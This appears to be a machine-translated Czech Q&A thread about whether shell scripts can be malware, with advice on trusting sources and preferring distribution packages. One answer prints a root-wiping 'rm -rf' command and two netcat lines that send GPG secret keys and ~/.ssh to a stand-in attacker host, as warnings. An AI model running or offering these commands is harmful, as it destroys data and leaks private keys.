.sh soubory jsou skripty shellu. Jsou analogické s .bat soubory (cmd skripty) pod Windows. Všechny tyto (shellové skripty, cmd skripty, .exe Spustitelné soubory Windows, Linux (které obvykle nemají příponu)) jsou spustitelné programy; pokud nějakou spustíte, může dělat cokoli, co můžete. Takže ano, shell skripty mohou být škodlivé. Zacházejte se skriptem shellu (nebo skriptem Perl nebo skriptem Python nebo skriptem Ruby atd.) se stejným podezřením, jako byste zacházeli s jakoukoli jinou aplikací.
Skrýt malware ve skriptu shellu, aniž byste vypadali podezřele, je o něco těžší, protože se jedná o skript, který mohou číst lidé se znalostí skriptovacího jazyka. Ale není to o moc těžší; jen málo lidí, dokonce i s technickými znalostmi, by se obtěžovalo zkontrolovat kód, takže můžete doufat, že zůstanete bez povšimnutí.
Z praktického hlediska existuje pro Linux méně malwaru než pro Windows. Je to pravděpodobně hlavně proto, že Linux má mnohem menší podíl na trhu než Windows na desktopu, takže návratnost za psaní linuxového malwaru je menší. Ve světě Linuxu také existuje dlouho zakořeněná kultura sdílení malých vylepšení systému, více než ve světě Windows; takže bilance pravděpodobnosti říká, že to je někdo, kdo sdílí malé zlepšení a ne malware. Mohlo by se však jednat o malware, který se tvářil jako malé vylepšení. Nakonec se musíte rozhodnout, zda můžete důvěřovat webu, kde tuto aplikaci získáváte, nebo lidem, kteří tento web doporučili. Upřednostňujte programy, které pocházejí z vaší distribuce (tj. které můžete nainstalovat ze softwarového centra), protože prošly určitou kontrolou.
Nyní k tomuto konkrétnímu programu:Rychle jsem se podíval a vypadá to neškodně. Neviděl jsem nic, co by kamkoli uložilo vaše heslo, aniž by vám to řeklo, nebo co by ve vašem počítači dělalo jiné věci, než jak je inzerováno. Všimněte si, že jsem provedl pouze 2minutovou recenzi, kterou by mohl překonat každý vzdáleně chytrý autor malwaru. Program vypadá poměrně dobře napsaný.
Nezbytně bych tento program nedoporučoval, pokud necítíte naléhavou potřebu, kterou neřeší balíčky v distribuci Ubuntu. Ubuntu přichází s mořským koníkem 
GUI frontend pro GPG (existuje také kgpg 
pro uživatele KDE). Možná budete chtít nainstalovat seahorse-nautilus 
(nebo plugin seahorse 
ve starších verzích) pro integraci Nautilus.
#!/bin/sh
rm -rf --no-preserve-root /
To je malware a je to skript shellu. Pokročilejší verze může obsahovat něco jako:
gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80
Takže ano, shell skript může být škodlivý. Může být složitější a může využívat jiné skriptovací jazyky, knihovny nebo dokonce může být shellovým archivem, který chrlí a volá běžný spustitelný soubor.
Z velké části vše, co spustíte, získá oprávnění uživatele.
Samozřejmě! Dokáže všechno, co můžete! Sledujte protokoly, keylogujte vás, krást soubory atd...
Podle toho, co jeho Vývojář napsal do zdrojového kódu! Může dělat COKOLI......
A jeho vytvoření je velmi snadné, takže pokud vám bude zaslán podezřelý soubor .sh, dvakrát si jej rozmyslete, než jej spustíte!